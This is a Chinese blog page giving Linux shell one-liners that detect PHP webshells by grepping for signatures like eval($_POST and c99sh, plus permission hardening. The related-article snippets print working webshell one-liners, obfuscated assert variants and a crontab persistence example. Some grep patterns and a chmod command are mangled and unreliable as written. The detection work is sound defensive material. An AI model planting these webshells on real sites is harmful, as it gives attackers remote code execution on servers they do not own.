Linux shell快速查找PHP木马

最新推荐文章于 2024-08-20 17:30:45 发布
转载 最新推荐文章于 2024-08-20 17:30:45 发布 · 2.1k 阅读 · 1

本文介绍如何使用shell命令查找并处理PHP木马,包括查找特定类型的木马、排除非法eval函数、筛选可疑文件操作,并提供修改网站文件权限的方法。同时,指导如何下载网站源码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一句话查找 PHP 木马

find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc"> /tmp/php.txt
grep -r --include=*.php  '[^a-z]eval($_POST' . > /tmp/eval.txt
grep -r --include=*.php  'file_put_contents(.*$_POST\[.*\]);' . > /tmp/file_put_contents.txt
find ./ -name "*.php" -type f -print0 | xargs -0 egrep "(phpspy|c99sh|milw0rm|eval\(gzuncompress\(base64_decoolcode|eval\(base64_decoolcode|spider_bc|gzinflate)" | awk -F: '{print $1}' | sort | uniq
查找最近一天被修改的 PHP 文件

find -mtime -1 -type f -name \*.php
修改网站的权限

find -type f -name \*.php -exec chmod 444 {} \;
find ./ -type d -exec chmod 555{} \;


网站源码下载

寻找PHP(网站)挂马,后门
易天海
06-07 1490
原文:https://blog.youkuaiyun.com/MiltonZhong/article/details/9717179 php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行与加密: eval, assert, call_user_func,base...
Linux应急响应-溯源-系统日志排查
最新发布
09-23 1911
systemd-journald 是一个收集并存储各类日志数据的系统服务。它创建并维护一个带有索引的、结构化的日志数据库,并可以收集来自各种不同渠道的日志。systemd 是内核启动后的第一个用户进程,PID 为 1,是所有其它用户进程的父进程。所有服务的启动运行日志都可以记录到 systemd-journald 中,日志守护进程会以安全且不可伪造的方式自动收集每条日志的元数据。默认情况日志是存储在内存中的,系统重启后都会丢失。
LINUX下的PHP木马查询
maorenqi101的专栏
01-23 754
一句话查找PHP木马: 进入要处理的项目下执行如下命令   # find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc"> /tmp/php.txt   # grep -r --include=*.php '[^a-z]eval(
php木马在线扫描工具,PHP Web木马扫描器
weixin_29742557的博客
03-09 1022
header('content-type:text/html;charset=gbk');set_time_limit(0);//防止超时/**** php目录扫描监控增强版** @version 1.0*下面几个变量使用前需要手动设置***//*===================== 程序配置 =====================*/$pass="test";//设置密码$jkdir=...
php 网站服务器查找木马的方法
unixtech的博客
11-08 2234
由于每个网站使用的语言都不一样,无法做一个统一说明,只能举几个例子。假如你的网站使用php语言,植入的木马基本也都是php语言写的命令。 可以分别试试这两个命令,因为php木马常用eval和create_function来做坏事(说/var/www/路径不存在的同学,面壁思过10分钟)。 grep "eval(" /var/www/* -r grep "create_function(" /var/www/* -r
linux 查杀php木马,linuxphp木马、后门查杀总结
weixin_35676877的博客
03-26 495
Web Server(Nginx为例)1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞修正:if ($request_filename ~* (.*)\.php) {set $php_url $1;}if (!-e $php_url.php) {retur...
应急响应之linux 排查
网络安全
06-29 1518
有招聘需求的可以后台联系运营人员。最近发现一个不错的在线靶场,给大家推荐一下。 玄机靶场地址:https://xj.edisec.net/第一章 应急响应- Linux入侵排查1.web目录存在木马,请找到木马的密码提交 2.服务器疑似存在不死马,请找到不死马的密码提交 3.不死马是通过哪个文件生成的,请提交文件名 4.黑客留下了木马文件,请找出黑客的服务器ip提交 5.黑客留下了木马...
Linux Centos 78 计划任务 开机自动启动 查杀木马过程-使用 rootkit 隐藏踪迹
qq_287064772的博客
07-06 1653
15章:Linux Centos 7/8 计划任务 开机自动启动 查杀木马过程-使用 rootkit 隐藏踪迹 1、计划任务 1.1用户级别计划任务 使用计划任务 crontab 让木马自动运行 [root@localhost ~]# crontab -e #1 2 * * * /usr/bin/fregonnzkq & #注:分 时 天 月 周 ,表示每天 2 点 1 分,执行命令/usr/bin/fregonnzkq &。* 表每X,比如: 每天,每月,每周 用户计..
Linux靶机练习
SYJ_361的博客
03-27 1万+
这里是对Linux靶机的各种练习,包括Lampiao、Raven2、Tr0ll、zico2、DC-6、DC-9等,利用kali、蚁剑等对靶机进行提权,并找到root里面的flag文件
Linux查找Webshell挂马文件记录
大鹏
08-20 4634
服务器上被上传了webshell 肯定能够查到蛛丝马迹, 比如php文件的时间,如果我们可以查找最后一次网站代码更新以后的所有php文件 方法如下: 假设最后更新是10天前我们可以查找10天内生成的可以php文件: find /var/www/ -name “*.php” -mtime -10 也可以通过关键字的形式查找 常见的木马常用代码函数 eval,shell_ex
linux被植入木马排查思路
qq_59634082的博客
08-20 1997
1、查看一定时间内文件的情况 find / -name "*" -type f -newermt '2022-08-25 00:00:00'!2、查看tomcat、nginx的比较大的.jsp .htm文件 find /目录 -name .jsp -o -size +10000k。在相应的文件里把tomcat2用户添加的内容删除 /etc/shadow /etc/group ,异常用户直接锁定。3、查看passwd的修改时间,判断是否在不知情的情况下被添加用户 ls -l /etc/passwd。
php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的
weixin_39617669的博客
03-09 2523
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一...
linux制作图片句话木马,linux环境安装Suhosin禁用eval函数防一句话木马教程
weixin_39552768的博客
05-14 502
大多数一句话木马通过eval函数进行植入,如果能禁用掉eval函数,可以进一步加固服务器安全。而eval函数是无法通过php.ini直接禁用的,需要安装Suhosin扩展进行禁用。以下教程适用于php5.4版本(以下操作建议由专业运维人员操作)因为宝塔后台没有内置这个插件,所以我们需要连接服务器,通过命令行安装,首先链接登录服务器。然后按一下步骤操作。1、下载扩展源码(有些扩展版本需要与PHP版本...
linux服务器查杀,Linux服务器PHP后门查杀
weixin_42295892的博客
05-05 394
shell脚本一句话查找PHP一句话木马# find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))" > /tmp/php.txt# grep -r --include=*.php '[^a-z]eval($_POST' . &gt...
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 3599
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
ThinkPHP通过日志查找后门木马的方法
美奇软件开发工作室
04-21 1004
导读: 黑客会在很多开源框架里植入自己的木马或后门,典型的就是eval一句话,如果你使用的是开源程序,或者从别人那里购买回来的程序,一定要认真检查,及时清理掉后门木马,以免网站和服务器被黑客控制,从而造成不必要的损失。作为运维,可以通过查看网站日志查看是否有人尝试入侵,通过日志可以很清晰的了解到黑客的手段,下面分享我是怎么通过日志来查看的,如果发现有人尝试入侵,我会直接屏蔽他的IP,因为我的网站是自己开发的,并没有使用任何开源插件,所以才没有被黑客成功入侵。 一、使用文本替换专家2.5.exe工具,在网
牛逼的一句话木码
Daoke37的博客
05-10 473
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
你真的了解一句话木马吗?
热门推荐
Elite的博客
04-14 2万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木马文件,但是你真的了解它吗?
利用msfvenom创建Linux ELF木马反弹Shell教程
本资源主要介绍了如何通过Metasploit(MSF)框架生成Linux ELF木马并实现反弹Shell,以此来远程控制Linux系统。其中涉及的技术包括利用MSFvenom创建木马、设置反弹连接参数、在攻击机上架设HTTP服务、监听木马连接,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值